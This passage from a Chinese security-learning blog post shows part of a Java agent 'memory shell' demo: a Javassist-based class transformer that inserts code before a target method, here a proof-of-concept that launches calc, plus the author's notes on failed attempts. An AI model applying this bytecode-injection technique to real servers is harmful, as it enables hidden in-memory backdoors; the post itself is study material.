class="line">            <span class="keyword">while</span> ((line = br.readLine()) != <span class="keyword">null</span>) &#123;</span><br><span class="line">                bf.append(line);</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            br.close();</span><br><span class="line">            <span class="keyword">return</span> bf.toString();</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">byte</span>[] transform(ClassLoader loader, String className, Class&lt;?&gt; classBeingRedefined, ProtectionDomain protectionDomain, <span class="keyword">byte</span>[] classfileBuffer) &#123;</span><br><span class="line">        <span class="keyword">if</span> (!className.equals(targetVMClassName)) &#123;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">return</span> classfileBuffer;</span><br><span class="line">        &#125;</span><br><span class="line">                <span class="keyword">try</span> &#123;</span><br><span class="line"></span><br><span class="line">                    System.out.println(<span class="string">&quot;do transform&quot;</span>);</span><br><span class="line">                    ClassPool cp=ClassPool.getDefault();</span><br><span class="line">                    <span class="keyword">if</span> (classBeingRedefined != <span class="keyword">null</span>) &#123;</span><br><span class="line">                        <span class="comment">//添加新的路径</span></span><br><span class="line">                        ClassClassPath ccp = <span class="keyword">new</span> ClassClassPath(classBeingRedefined);</span><br><span class="line">                        cp.insertClassPath(ccp);</span><br><span class="line">                    &#125;</span><br><span class="line">                    System.out.println(<span class="string">&quot;获取到ClassPool&quot;</span>);</span><br><span class="line">                    CtClass ctc = cp.get(<span class="keyword">this</span>.targetClassName);</span><br><span class="line">                    System.out.println(ctc.getName());</span><br><span class="line">                    CtMethod method = ctc.getDeclaredMethod(<span class="keyword">this</span>.targetMethodName);</span><br><span class="line">                    System.out.println(method.getName());</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">                    String source = readTXT(<span class="string">&quot;C:\\Users\\yuand\\Desktop\\data2.txt&quot;</span>);</span><br><span class="line">                    source=<span class="string">&quot;try &#123;\n&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;            Runtime.getRuntime().exec(\&quot;calc\&quot;);\n&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;        &#125; catch (java.io.IOException e) &#123;\n&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;            e.printStackTrace();\n&quot;</span> +</span><br><span class="line">                            <span class="string">&quot;        &#125;&quot;</span>;</span><br><span class="line"></span><br><span class="line">                    System.out.println(<span class="string">&quot;执行插入代码方法&quot;</span>);</span><br><span class="line"></span><br><span class="line">                    method.insertBefore(source);</span><br><span class="line">                    <span class="keyword">byte</span>[] bytes = ctc.toBytecode();</span><br><span class="line">                    ctc.detach();</span><br><span class="line">                    <span class="keyword">return</span> bytes;</span><br><span class="line"></span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">catch</span> (Exception e)&#123;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">                    e.printStackTrace();</span><br><span class="line">                &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>插入代码这里通过txt文件读取的代码总是因为格式原因报错,直接写的打开计算器的代码可以正常插入并执行</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220429110139169.png" alt="image-20220429110139169"></p>
<p>对于txt文件内代码格式问题还需要再稍微研究一下</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/memshell/" rel="tag"># memshell</a>
              <a href="/tags/javaAgent/" rel="tag"># javaAgent</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/04/23/%E5%86%85%E5%AD%98%E9%A9%AC%E9%98%B2killed/" rel="prev" title="内存马防killed">
      <i class="fa fa-chevron-left"></i> 内存马防killed
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/05/04/jndi%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0/" rel="next" title="jndi注入学习">
      jndi注入学习 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BB%A3%E7%A0%81%E5%AE%9E%E7%8E%B0"><span class="nav-number">1.</span> <span class="nav-text">代码实现</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#premain%E7%AE%80%E5%8D%95%E5%AE%9E%E7%8E%B0"><span class="nav-number">2.</span> <span class="nav-text">premain简单实现</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#agentmain"><span class="nav-number"></span> <span class="nav-text">agentmain</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#instrumentation"><span class="nav-number"></span> <span class="nav-text">instrumentation</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#getAllloadedClasses%E5%92%8CisModifiableClass"><span class="nav-number">0.1.</span> <span class="nav-text">getAllloadedClasses和isModifiableClass</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#addTransformer-%E5%92%8CretransformClasses"><span class="nav-number">0.2.</span> <span class="nav-text">addTransformer()和retransformClasses()</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#javassist"><span class="nav-number">1.</span> <span class="nav-text">javassist</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#ClassPool"><span class="nav-number">1.1.</span> <span class="nav-text">ClassPool</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#CtClass"><span class="nav-number">1.2.</span> <span class="nav-text">CtClass</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#CtMethod"><span class="nav-number">1.3.</span> <span class="nav-text">CtMethod</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#agent-jar"><span class="nav-number">2.</span> <span class="nav-text">agent.jar</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#MANIFEST-MF"><span class="nav-number">2.1.</span> <span class="nav-text">MANIFEST.MF</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#TransformerDemo-java"><span class="nav-number">2.2.</span> <span class="nav-text">TransformerDemo.java</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#AgentDemo-java"><span class="nav-number">2.3.</span> <span class="nav-text">AgentDemo.java</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Hello-java"><span class="nav-number">2.4.</span> <span class="nav-text">Hello.java</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#HelloWorld-java"><span class="nav-number">2.5.</span> <span class="nav-text">HelloWorld.java</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Agent%E5%86%85%E5%AD%98%E9%A9%AC"><span class="nav-number">3.</span> <span class="nav-text">Agent内存马</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BB%A3%E7%A0%81"><span class="nav-number">3.1.</span> <span class="nav-text">代码</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#AgentDemo"><span class="nav-number">3.2.</span> <span class="nav-text">AgentDemo</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#TransformerDemo"><span class="nav-number">3.3.</span> <span class="nav-text">TransformerDemo</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="blueSatchel"
      src="/../images/avatar.PNG">
  <p class="site-author-name" itemprop="name">blueSatchel</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">67</span>
          <span class="site-state-item-name">文章</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">20</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">64</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/bluesatchel" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;bluesatchel" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">blueSatchel</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : 'Aps2pGDp4GmAT5ebqUw6RUat-gzGzoHsz',
      appKey     : 'mikzA3qOg4gHjM10U4N8h52T',
      placeholder: "来说两句吧呜呜呜",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : '' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
